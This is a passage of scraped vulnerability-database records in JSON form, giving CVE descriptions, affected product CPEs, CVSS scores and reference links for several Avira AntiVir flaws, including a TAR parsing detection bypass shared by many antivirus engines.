            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "The file parsing engine in Avira Antivir Antivirus before 7.04.00.24 allows remote attackers to cause a denial of service (application crash) via a crafted UPX compressed file, which triggers a divide-by-zero error.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "n/a",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "avira-antivir-upx-dos(34556)",
                     refsource: "XF",
                     url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34556",
                  },
                  {
                     name: "24187",
                     refsource: "BID",
                     url: "http://www.securityfocus.com/bid/24187",
                  },
                  {
                     name: "http://forum.antivir-pe.de/thread.php?threadid=22528",
                     refsource: "CONFIRM",
                     url: "http://forum.antivir-pe.de/thread.php?threadid=22528",
                  },
                  {
                     name: "http://www.nruns.com/advisories/%5Bn.runs-SA-2007.011%5D%20-%20Avira%20Antivir%20Antivirus%20UPX%20parsing%20Divide%20by%20Zero%20Advisory.txt",
                     refsource: "MISC",
                     url: "http://www.nruns.com/advisories/%5Bn.runs-SA-2007.011%5D%20-%20Avira%20Antivir%20Antivirus%20UPX%20parsing%20Divide%20by%20Zero%20Advisory.txt",
                  },
                  {
                     name: "ADV-2007-1971",
                     refsource: "VUPEN",
                     url: "http://www.vupen.com/english/advisories/2007/1971",
                  },
                  {
                     name: "36710",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/36710",
                  },
                  {
                     name: "25417",
                     refsource: "SECUNIA",
                     url: "http://secunia.com/advisories/25417",
                  },
                  {
                     name: "20070529 n.runs-SA-2007.011 - Avira Antivir Antivirus UPX parsing Divide by Zero Advisory",
                     refsource: "BUGTRAQ",
                     url: "http://www.securityfocus.com/archive/1/469880/100/0/threaded",
                  },
                  {
                     name: "20070529 n.runs-SA-2007.011 - Avira Antivir Antivirus UPX",
                     refsource: "FULLDISC",
                     url: "http://marc.info/?l=full-disclosure&m=118040810718045&w=2",
                  },
                  {
                     name: "1018132",
                     refsource: "SECTRACK",
                     url: "http://www.securitytracker.com/id?1018132",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
      assignerShortName: "mitre",
      cveId: "CVE-2007-2972",
      datePublished: "2007-06-01T01:00:00",
      dateReserved: "2007-05-31T00:00:00",
      dateUpdated: "2024-08-07T13:57:54.603Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

cve-2009-2761
Vulnerability from cvelistv5
Published
2009-08-13 16:00
Modified
2024-08-07 05:59
Severity ?
Summary
Unquoted Windows search path vulnerability in the scheduler (sched.exe) in Avira AntiVir, AntiVir Premium, Premium Security Suite, and AntiVir Professional might allow local users to gain privileges via a malicious antivir.exe file in the "C:\Program Files\avira\" directory.
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-07T05:59:57.149Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  name: "55647",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://www.osvdb.org/55647",
               },
               {
                  name: "ADV-2008-3130",
                  tags: [
                     "vdb-entry",
                     "x_refsource_VUPEN",
                     "x_transferred",
                  ],
                  url: "http://www.vupen.com/english/advisories/2008/3130",
               },
               {
                  name: "avira-createprocess-privilege-escalation(46568)",
                  tags: [
                     "vdb-entry",
                     "x_refsource_XF",
                     "x_transferred",
                  ],
                  url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/46568",
               },
               {
                  name: "20090115 [TZO-2009-2] Avira Antivir - Priviledge escalation",
                  tags: [
                     "mailing-list",
                     "x_refsource_FULLDISC",
                     "x_transferred",
                  ],
                  url: "http://archives.neohapsis.com/archives/bugtraq/2009-01/0146.html",
               },
               {
                  tags: [
                     "x_refsource_MISC",
                     "x_transferred",
                  ],
                  url: "http://blog.zoller.lu/2009/01/tzo-2009-2-avira-antivir-priviledge.html",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "n/a",
               vendor: "n/a",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2009-01-15T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "Unquoted Windows search path vulnerability in the scheduler (sched.exe) in Avira AntiVir, AntiVir Premium, Premium Security Suite, and AntiVir Professional might allow local users to gain privileges via a malicious antivir.exe file in the \"C:\\Program Files\\avira\\\" directory.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "n/a",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2017-08-16T14:57:01",
            orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            shortName: "mitre",
         },
         references: [
            {
               name: "55647",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://www.osvdb.org/55647",
            },
            {
               name: "ADV-2008-3130",
               tags: [
                  "vdb-entry",
                  "x_refsource_VUPEN",
               ],
               url: "http://www.vupen.com/english/advisories/2008/3130",
            },
            {
               name: "avira-createprocess-privilege-escalation(46568)",
               tags: [
                  "vdb-entry",
                  "x_refsource_XF",
               ],
               url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/46568",
            },
            {
               name: "20090115 [TZO-2009-2] Avira Antivir - Priviledge escalation",
               tags: [
                  "mailing-list",
                  "x_refsource_FULLDISC",
               ],
               url: "http://archives.neohapsis.com/archives/bugtraq/2009-01/0146.html",
            },
            {
               tags: [
                  "x_refsource_MISC",
               ],
               url: "http://blog.zoller.lu/2009/01/tzo-2009-2-avira-antivir-priviledge.html",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "cve@mitre.org",
               ID: "CVE-2009-2761",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "n/a",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "Unquoted Windows search path vulnerability in the scheduler (sched.exe) in Avira AntiVir, AntiVir Premium, Premium Security Suite, and AntiVir Professional might allow local users to gain privileges via a malicious antivir.exe file in the \"C:\\Program Files\\avira\\\" directory.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "n/a",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "55647",
                     refsource: "OSVDB",
                     url: "http://www.osvdb.org/55647",
                  },
                  {
                     name: "ADV-2008-3130",
                     refsource: "VUPEN",
                     url: "http://www.vupen.com/english/advisories/2008/3130",
                  },
                  {
                     name: "avira-createprocess-privilege-escalation(46568)",
                     refsource: "XF",
                     url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/46568",
                  },
                  {
                     name: "20090115 [TZO-2009-2] Avira Antivir - Priviledge escalation",
                     refsource: "FULLDISC",
                     url: "http://archives.neohapsis.com/archives/bugtraq/2009-01/0146.html",
                  },
                  {
                     name: "http://blog.zoller.lu/2009/01/tzo-2009-2-avira-antivir-priviledge.html",
                     refsource: "MISC",
                     url: "http://blog.zoller.lu/2009/01/tzo-2009-2-avira-antivir-priviledge.html",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
      assignerShortName: "mitre",
      cveId: "CVE-2009-2761",
      datePublished: "2009-08-13T16:00:00",
      dateReserved: "2009-08-13T00:00:00",
      dateUpdated: "2024-08-07T05:59:57.149Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

Vulnerability from fkie_nvd
Published
2012-03-21 10:11
Modified
2024-11-21 01:37
Severity 4.3 (MEDIUM), CVSS v2.0 AV:N/AC:M/Au:N/C:N/I:P/A:N (source: nvd@nist.gov)
Summary
The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, F-Prot Antivirus 4.6.2.117, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field that exceeds the total TAR file size. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations.
References
cve@mitre.org | http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html
cve@mitre.org | http://osvdb.org/80389
cve@mitre.org | http://osvdb.org/80391
cve@mitre.org | http://osvdb.org/80392
cve@mitre.org | http://osvdb.org/80393
cve@mitre.org | http://osvdb.org/80395
cve@mitre.org | http://osvdb.org/80396
cve@mitre.org | http://osvdb.org/80403
cve@mitre.org | http://osvdb.org/80406
cve@mitre.org | http://osvdb.org/80407
cve@mitre.org | http://osvdb.org/80409
cve@mitre.org | http://www.ieee-security.org/TC/SP2012/program.html
cve@mitre.org | http://www.mandriva.com/security/advisories?name=MDVSA-2012:094
cve@mitre.org | http://www.securityfocus.com/archive/1/522005
cve@mitre.org | http://www.securityfocus.com/bid/52610
cve@mitre.org | https://exchange.xforce.ibmcloud.com/vulnerabilities/74293
af854a3a-2127-422b-91ae-364da2661108 | http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/80389
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/80391
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/80392
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/80393
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/80395
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/80396
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/80403
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/80406
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/80407
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/80409
af854a3a-2127-422b-91ae-364da2661108 | http://www.ieee-security.org/TC/SP2012/program.html
af854a3a-2127-422b-91ae-364da2661108 | http://www.mandriva.com/security/advisories?name=MDVSA-2012:094
af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/archive/1/522005
af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/52610
af854a3a-2127-422b-91ae-364da2661108 | https://exchange.xforce.ibmcloud.com/vulnerabilities/74293



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:a:aladdin:esafe:7.0.17.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "5C6590DF-9164-4A76-ADEE-9110C5E3588E",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:alwil:avast_antivirus:4.8.1351.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "5A3A2FBE-3113-4CCB-8FCF-54CBD78FDF52",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:alwil:avast_antivirus:5.0.677.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "7877C5C9-C4CA-406F-A61A-EAFBA846A20D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:anti-virus:vba32:3.12.14.2:*:*:*:*:*:*:*",
                     matchCriteriaId: "2A0325DA-A137-41E0-BD5E-B892F2166749",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:antiy:avl_sdk:2.0.3.7:*:*:*:*:*:*:*",
                     matchCriteriaId: "38855431-9C17-41FE-8325-A3304DECAC92",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:authentium:command_antivirus:5.2.11.5:*:*:*:*:*:*:*",
                     matchCriteriaId: "192DFD98-11AA-4E7A-A1CB-53FC06FEB20F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avg:avg_anti-virus:10.0.0.1190:*:*:*:*:*:*:*",
                     matchCriteriaId: "4E62090C-AF41-4032-B9F7-78FEBDB4AAE1",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir:7.11.1.163:*:*:*:*:*:*:*",
                     matchCriteriaId: "62B656B8-A7FB-4451-8A32-CB7AB74165F0",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:bitdefender:bitdefender:7.2:*:*:*:*:*:*:*",
                     matchCriteriaId: "24D7D7FA-20E9-4560-ABC6-154CD918E307",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:cat:quick_heal:11.00:*:*:*:*:*:*:*",
                     matchCriteriaId: "343D3F40-E028-4AEE-82A4-0A17C1D1ED13",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:clamav:clamav:0.96.4:*:*:*:*:*:*:*",
                     matchCriteriaId: "953C363B-AD5B-4C53-AAF0-AB6BA4040D74",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:emsisoft:anti-malware:5.1.0.1:*:*:*:*:*:*:*",
                     matchCriteriaId: "488ED4D6-0A32-43D5-840C-F76919C41C45",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:eset:nod32_antivirus:5795:*:*:*:*:*:*:*",
                     matchCriteriaId: "673B999A-11D2-4AFF-9930-0C06E8BBAA7F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:f-prot:f-prot_antivirus:4.6.2.117:*:*:*:*:*:*:*",
                     matchCriteriaId: "961708EB-3124-4147-A36D-BAD9241D0C88",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:gdata-software:g_data_antivirus:21:*:*:*:*:*:*:*",
                     matchCriteriaId: "DA047323-54B7-460B-9AA0-88C3C4183218",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:ikarus:ikarus_virus_utilities_t3_command_line_scanner:1.1.97.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "1759C4A5-67D1-4722-954A-883694E57FAB",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:jiangmin:jiangmin_antivirus:13.0.900:*:*:*:*:*:*:*",
                     matchCriteriaId: "620DC756-B821-413C-A824-43C221E573AA",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:k7computing:antivirus:9.77.3565:*:*:*:*:*:*:*",
                     matchCriteriaId: "B27BD224-CB70-43D2-8B0D-9F229A646B82",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:kaspersky:kaspersky_anti-virus:7.0.0.125:*:*:*:*:*:*:*",
                     matchCriteriaId: "FD9BCB3B-0FE8-4716-ABC2-1DB89D330F56",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:mcafee:gateway:2010.1c:*:*:*:*:*:*:*",
                     matchCriteriaId: "18FC30B1-4FB3-4891-93FE-63A93E686EB3",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:mcafee:scan_engine:5.400.0.1158:*:*:*:*:*:*:*",
                     matchCriteriaId: "0BCE1228-61BE-4C10-898A-B8BDC5A71156",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:microsoft:security_essentials:2.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "7C382AA8-5E99-4669-9825-F5BBEEC12907",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:norman:norman_antivirus_\\&_antispyware:6.06.12:*:*:*:*:*:*:*",
                     matchCriteriaId: "81D01633-1000-425D-9026-59C50734956A",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:pc_tools:pc_tools_antivirus:7.0.3.5:*:*:*:*:*:*:*",
                     matchCriteriaId: "410EEFDA-CFE6-4DDE-B661-BB01009B0E60",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:rising-global:rising_antivirus:22.83.00.03:*:*:*:*:*:*:*",
                     matchCriteriaId: "EF8ADA91-4042-4E1B-9F14-78023F24B137",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:symantec:endpoint_protection:11.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "E269D396-3A70-4C4B-9D79-CBBA75C280D8",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:trendmicro:housecall:9.120.0.1004:*:*:*:*:*:*:*",
                     matchCriteriaId: "B3C3D7B7-3DD1-417E-9488-A3B0F28F75E1",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:trendmicro:trend_micro_antivirus:9.120.0.1004:*:*:*:*:*:*:*",
                     matchCriteriaId: "72379F97-0BCA-425A-92AE-9F336866FD07",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:virusbuster:virusbuster:13.6.151.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "32C656A2-AAAC-494A-A981-A83144070857",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, F-Prot Antivirus 4.6.2.117, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field that exceeds the total TAR file size.  NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations.",
      },
      {
         lang: "es",
         value: "El analizador de archivos TAR en Avira AntiVir versión 7.11.1.163, Antiy Labs AVL SDK versión 2.0.3.7, avast! antivirus versiones 4.8.1351.0 y 5.0.677.0, AVG Anti-Virus versión 10.0.0.1190, Bitdefender versión 7.2, Quick Heal (también se conoce como Cat QuickHeal) versión 11.00, ClamAV versión 0.96.4, Command Antivirus versión 5.2.11.5, Emsisoft Anti-Malware versión 5.1.0.1, eSafe versión 7.0.17.0, F-Prot antivirus versión 4.6.2.117, G Data AntiVirus versión 21, Ikarus Virus Utilities T3 Command Line Scanner versión 1.1.97.0, Jiangmin Antivirus versión 13.0.900, K7 AntiVirus versión 9.77.3565, Kaspersky Anti-Virus versión 7.0.0.125, McAfee Anti-Virus Scanning Engine versión 5.400.0.1158, McAfee Gateway (anteriormente Webwasher) versión 2010.1C, Antimalware Engine versión 1.1.6402.0 en Microsoft Security Essentials versión 2.0, NOD32 Antivirus versión 5795, Norman Antivirus versión 6.06.12 , PC Tools AntiVirus versión 7.0.3.5, Rising Antivirus versión 22.83.00.03, AVEngine versión 20101.3.0.103 en Symantec Endpoint Protection versión 11, Trend Micro AntiVirus versión 9.120.0.1004, Trend Micro HouseCall versión 9.120.0.1004, VBA32 versión 3.12.14.2 y VirusBuster versión 13.6.151.0 , permite a los atacantes remotos omitir la detección de malware por medio de una entrada de archivo TAR con un campo de longitud que supera el tamaño total del archivo TAR. NOTA: esto puede ser más tarde SPLIT en varios CVE si se publica información adicional que muestra que el error se produjo de manera independiente en diferentes implementaciones de analizador de TAR.",
      },
   ],
   id: "CVE-2012-1457",
   lastModified: "2024-11-21T01:37:01.753",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "MEDIUM",
            cvssData: {
               accessComplexity: "MEDIUM",
               accessVector: "NETWORK",
               authentication: "NONE",
               availabilityImpact: "NONE",
               baseScore: 4.3,
               confidentialityImpact: "NONE",
               integrityImpact: "PARTIAL",
               vectorString: "AV:N/AC:M/Au:N/C:N/I:P/A:N",
               version: "2.0",
            },
            exploitabilityScore: 8.6,
            impactScore: 2.9,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
   },
   published: "2012-03-21T10:11:49.287",
   references: [
      {
         source: "cve@mitre.org",
         url: "http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80389",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80391",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80392",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80393",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80395",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80396",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80403",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80406",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80407",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80409",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.ieee-security.org/TC/SP2012/program.html",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.mandriva.com/security/advisories?name=MDVSA-2012:094",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.securityfocus.com/archive/1/522005",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.securityfocus.com/bid/52610",
      },
      {
         source: "cve@mitre.org",
         url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/74293",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80389",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80391",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80392",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80393",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80395",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80396",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80403",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80406",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80407",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80409",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.ieee-security.org/TC/SP2012/program.html",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.mandriva.com/security/advisories?name=MDVSA-2012:094",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.securityfocus.com/archive/1/522005",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.securityfocus.com/bid/52610",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/74293",
      },
   ],
   sourceIdentifier: "cve@mitre.org",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-264",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2007-06-01 01:30
Modified
2024-11-21 00:32
Severity 10 (HIGH), CVSS v2.0 AV:N/AC:L/Au:N/C:C/I:C/A:C (source: nvd@nist.gov)
Summary
Buffer overflow in the file parsing engine in Avira Antivir Antivirus before 7.03.00.09 allows remote attackers to execute arbitrary code via a crafted LZH archive file, resulting from an "integer cast around."
References
cve@mitre.org | http://forum.antivir-pe.de/thread.php?threadid=22528 | Patch
cve@mitre.org | http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/063624.html
cve@mitre.org | http://osvdb.org/36712
cve@mitre.org | http://secunia.com/advisories/25417 | Patch, Vendor Advisory
cve@mitre.org | http://securityreason.com/securityalert/2764
cve@mitre.org | http://securitytracker.com/id?1018131
cve@mitre.org | http://www.nruns.com/advisories/%5Bn.runs-SA-2007.010%5D%20-%20Avira%20Antivir%20Antivirus%20LZH%20parsing%20Arbitrary%20Code%20Execution%20Advisory.txt | Patch, Vendor Advisory
cve@mitre.org | http://www.securityfocus.com/archive/1/469805/100/0/threaded
cve@mitre.org | http://www.securityfocus.com/bid/24187 | Patch
cve@mitre.org | http://www.vupen.com/english/advisories/2007/1971
cve@mitre.org | https://exchange.xforce.ibmcloud.com/vulnerabilities/34551
af854a3a-2127-422b-91ae-364da2661108 | http://forum.antivir-pe.de/thread.php?threadid=22528 | Patch
af854a3a-2127-422b-91ae-364da2661108 | http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/063624.html
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/36712
af854a3a-2127-422b-91ae-364da2661108 | http://secunia.com/advisories/25417 | Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108 | http://securityreason.com/securityalert/2764
af854a3a-2127-422b-91ae-364da2661108 | http://securitytracker.com/id?1018131
af854a3a-2127-422b-91ae-364da2661108 | http://www.nruns.com/advisories/%5Bn.runs-SA-2007.010%5D%20-%20Avira%20Antivir%20Antivirus%20LZH%20parsing%20Arbitrary%20Code%20Execution%20Advisory.txt | Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/archive/1/469805/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/24187 | Patch
af854a3a-2127-422b-91ae-364da2661108 | http://www.vupen.com/english/advisories/2007/1971
af854a3a-2127-422b-91ae-364da2661108 | https://exchange.xforce.ibmcloud.com/vulnerabilities/34551
Impacted products
Vendor Product Version
avira antivir *
avira av_pack *



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:a:avira:antivir:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "445D730C-D41D-4014-8F47-42941554D65A",
                     versionEndIncluding: "7.04.00.23",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:av_pack:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "A9634F84-4E81-45F8-B040-9E08B30BF190",
                     versionEndIncluding: "7.03.00.08",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "Buffer overflow in the file parsing engine in Avira Antivir Antivirus before 7.03.00.09 allows remote attackers to execute arbitrary code via a crafted LZH archive file, resulting from an \"integer cast around.\"",
      },
      {
         lang: "es",
         value: "Desbordamiento de búfer en el motor de análisis sintáctico de ficheros en el Antivirus Avira Antivir anterior al 7.03.00.09 permite a atacantes remotos ejecutar código de su elección a través de un fichero LZH modificado, resultado de un \"redondeo de conversión a entero\".",
      },
   ],
   id: "CVE-2007-2974",
   lastModified: "2024-11-21T00:32:06.130",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "HIGH",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "NETWORK",
               authentication: "NONE",
               availabilityImpact: "COMPLETE",
               baseScore: 10,
               confidentialityImpact: "COMPLETE",
               integrityImpact: "COMPLETE",
               vectorString: "AV:N/AC:L/Au:N/C:C/I:C/A:C",
               version: "2.0",
            },
            exploitabilityScore: 10,
            impactScore: 10,
            obtainAllPrivilege: true,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
   },
   published: "2007-06-01T01:30:00.000",
   references: [
      {
